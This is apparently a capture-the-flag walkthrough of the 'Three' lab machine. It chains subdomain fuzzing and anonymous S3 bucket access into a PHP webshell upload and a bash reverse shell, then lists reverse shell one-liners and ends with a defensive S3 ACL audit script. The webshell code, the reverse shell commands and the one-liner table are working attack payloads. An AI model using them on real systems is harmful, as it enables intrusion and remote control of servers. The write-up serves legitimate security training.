⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Three introduces cloud security fundamentals through an attack chain that combines subdomain enumeration, discovery of a misconfigured public AWS S3 bucket, uploading a PHP webshell, and catching a reverse shell. This machine is particularly relevant to modern security — cloud storage misconfigurations are among the most prevalent real-world findings, and the ability to weaponise a writable S3 bucket for code execution is a critical skill.

Tools: nmap · awscli · gobuster · netcat  ·  Difficulty: Easy  ·  OS: Linux
01 — What You Will Learn
Skill | Why it matters
Subdomain enumeration | Subdomains often expose dev/staging environments with weaker security
S3 bucket enumeration via awscli | Public S3 buckets are a top cloud misconfiguration — writable ones enable file upload
PHP webshell upload | Uploading executable code to a web-accessible location is the classic web shell path
Reverse shell with netcat | Turning command execution into an interactive shell is a core post-exploitation skill
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1
80/tcp open  http    Apache httpd 2.4.29

Port 80 runs a website. Inspect the page source for any hints about the domain or subdomains — you'll find a contact email that reveals the domain: thetoppers.htb.

Add to /etc/hosts
echo "10.129.x.x thetoppers.htb" | sudo tee -a /etc/hosts
03 — Subdomain Enumeration
Fuzz for virtual hosts / subdomains
gobuster vhost \
  -u http://thetoppers.htb \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  --append-domain
Output
Found: s3.thetoppers.htb (Status: 404)

What you're seeing: an S3-style subdomain — s3.thetoppers.htb. This is a LocalStack or self-hosted S3-compatible endpoint. Add it to /etc/hosts and interact with it using the AWS CLI.

Add subdomain to /etc/hosts
echo "10.129.x.x s3.thetoppers.htb" | sudo tee -a /etc/hosts
04 — Enumerating the S3 Bucket
List buckets (no real credentials needed for open buckets)
aws --endpoint-url http://s3.thetoppers.htb s3 ls --no-sign-request
Output
2022-04-13 19:23:29 thetoppers.htb
List the bucket contents
aws --endpoint-url http://s3.thetoppers.htb s3 ls s3://thetoppers.htb --no-sign-request
Output
                           PRE images/
2022-04-13 19:23:29          0 .htaccess
2022-04-13 19:23:29       9053 index.php

What you're seeing: the S3 bucket contains the web application files — including index.php. The website is being served directly from this S3 bucket. If you can upload a PHP file, it will be executable via the web server.

05 — Uploading a Webshell
Create a minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Upload to the bucket
aws --endpoint-url http://s3.thetoppers.htb s3 cp shell.php \
  s3://thetoppers.htb/shell.php --no-sign-request
Test command execution
curl "http://thetoppers.htb/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
✓ Remote code execution confirmed as www-data.
06 — Getting a Reverse Shell
Start a netcat listener on your machine
nc -lvnp 4444
Trigger the reverse shell via the webshell (URL-encode the payload)
curl "http://thetoppers.htb/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/YOUR_IP/4444+0>%261'"
Find the flag
find / -name flag.txt 2>/dev/null
cat /var/www/flag.txt
✓ Submit the flag string to complete the machine.
07 — Reverse Shell One-liners Reference
Payload: bash -i >& /dev/tcp/IP/PORT 0>&1
  Notes: Most reliable on Linux — requires bash
Payload: python3 -c 'import socket,subprocess...'
  Notes: Works when bash is restricted, Python available
Payload: php -r '$sock=fsockopen("IP",PORT);...'
  Notes: PHP one-liner — useful in webshell context
Payload: nc -e /bin/sh IP PORT
  Notes: Netcat with -e flag (not available on all versions)
Payload: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT>/tmp/f
  Notes: FIFO-based — works on netcat without -e
08 — Key Takeaways
S3 buckets hosting web application files are a critical misconfiguration. If the bucket is writable, the website is fully compromised — any uploaded PHP file becomes executable code running on the server.
Concept | Real-world relevance
S3 public write access | One of the most impactful cloud misconfigs — check bucket ACLs and block public access settings
Subdomain enumeration | Dev/staging subdomains regularly expose admin panels, internal APIs, and cloud storage endpoints
Webshell → reverse shell | A webshell gives command execution, but a reverse shell gives an interactive session — always upgrade
awscli with --no-sign-request | Public S3 resources don't require AWS credentials — the --no-sign-request flag bypasses auth entirely
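As an added example (not code from the writeup), a small Python audit that flags the ACL state this box relies on (anonymous READ and WRITE for AllUsers) and shows how the Block Public Access settings from the takeaway neutralise it. The ACL and Block Public Access dicts are constructed samples in the shape boto3's get_bucket_acl() and get_public_access_block() return; a real audit would fetch them per bucket with boto3, and a LocalStack-style endpoint like the one on this machine may not implement Block Public Access at all.

```python
"""Audit S3 bucket ACL grants and Block Public Access settings for the
misconfiguration in this walkthrough: a bucket anyone can list and write to
without credentials. Added example, not the writeup's code; the ACL and Block
Public Access dicts are constructed samples in the shape boto3's
get_bucket_acl() / get_public_access_block() return."""

# Grantee URIs meaning "anyone on the internet" / "any AWS account".
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS: "AllUsers", AUTH_USERS: "AuthenticatedUsers"}
READ_PERMS = {"READ", "FULL_CONTROL"}    # lets `aws s3 ls --no-sign-request` list the bucket
WRITE_PERMS = {"WRITE", "FULL_CONTROL"}  # lets `aws s3 cp --no-sign-request` upload files

# Constructed sample ACL like the one that would let shell.php be uploaded.
OPEN_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},
]}
# Constructed sample of the remediated Block Public Access configuration.
HARDENED_PAB = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                "BlockPublicPolicy": True, "RestrictPublicBuckets": True}

def public_grants(acl):
    """(group, permission) pairs granted to AllUsers or AuthenticatedUsers."""
    return [(PUBLIC_GROUPS[g["Grantee"]["URI"]], g["Permission"])
            for g in acl.get("Grants", [])
            if g["Grantee"].get("Type") == "Group"
            and g["Grantee"].get("URI") in PUBLIC_GROUPS]

def assess_bucket(name, acl, pab):
    """Findings for one bucket. pab is its PublicAccessBlockConfiguration
    ({} when none is set); IgnorePublicAcls=True makes public ACL grants
    inert, so they are not reported as findings in that case."""
    grants = [] if pab.get("IgnorePublicAcls") else public_grants(acl)
    findings = []
    if any(p in WRITE_PERMS for _, p in grants):
        findings.append("public-write")  # anyone can drop files into the web root
    if any(p in READ_PERMS for _, p in grants):
        findings.append("public-read")   # anyone can enumerate the bucket
    return {"bucket": name, "public_grants": grants, "findings": findings}

if __name__ == "__main__":
    print(assess_bucket("thetoppers.htb", OPEN_ACL, {}))            # as found
    print(assess_bucket("thetoppers.htb", OPEN_ACL, HARDENED_PAB))  # after remediation
```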